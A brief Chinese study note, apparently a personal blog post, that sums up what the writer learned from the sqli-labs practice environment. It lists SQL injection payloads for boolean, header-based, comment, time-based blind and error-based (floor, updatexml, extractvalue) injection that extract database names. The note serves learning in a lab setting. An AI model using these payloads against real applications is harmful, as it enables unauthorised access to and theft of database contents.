sqli-labs全部过了一遍 这里总结下这段时间学习到的东西 然后转战下sql脚本和sqlmap源码
简单注入: 单引号 双引号 and or 1=1 1=2 a()
POST注入: agent cookie referrer注入
注释注入 # --+
盲注:判断 ascii(substr((select database()),1,1))>10 sleep(5)
报错型注入:floor:and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from
information_schema.tables group by x)a)
updatexml:and 1=updatexml(1,concat(0x7e,(select database())),1)
extractvalue:and 1=extractvalue(1,concat(0x7e,(select database())))
先想这么多 以后补充